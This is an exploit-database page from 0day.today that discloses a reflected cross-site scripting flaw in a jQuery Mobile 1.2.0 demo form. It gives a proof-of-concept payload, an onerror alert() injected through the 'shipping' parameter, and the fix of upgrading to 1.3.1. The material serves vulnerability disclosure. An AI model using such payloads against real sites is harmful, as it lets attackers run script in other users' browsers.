[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

jQuery Mobile Docs 1.2.0 final XSS Vulnerability

Author
dr.d3v1l
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24195
Category
web applications
Date add
05-09-2015
Platform
php
# Exploit Title: jQuery Mobile Docs  1.2.0 final   XSS Reflected 
# Software Link: http://demos.jquerymobile.com/1.2.1/
# Exploit Author: Andrei Manole
# Contact: manoleandrei94@gamil.com
# Tested On : Windows FireFox
# CVE : N/A
# Category: webapps
# Date: 05/09/2015
 
1. Description
   
 Reflective XSS on forms-sample-response.php?shipping=

 
2. POC  

URL:
http://localhost/fileadmin/mobile_site/templates/docs/forms/forms-sample-response.php?shipping=
 
e.g.
 
code: "><img src="http://url.to.file.which/not.exist" onerror=alert(1);>

URL+CODE= http://localhost/fileadmin/mobile_site/templates/docs/forms/forms-sample-response.php?shipping="><img src="http://url.to.file.which/not.exist" onerror=alert(1);>
   
3. Solution:
   
Update to version 1.3.1
http://demos.jquerymobile.com/1.3.1/

#  0day.today [2024-11-15]  #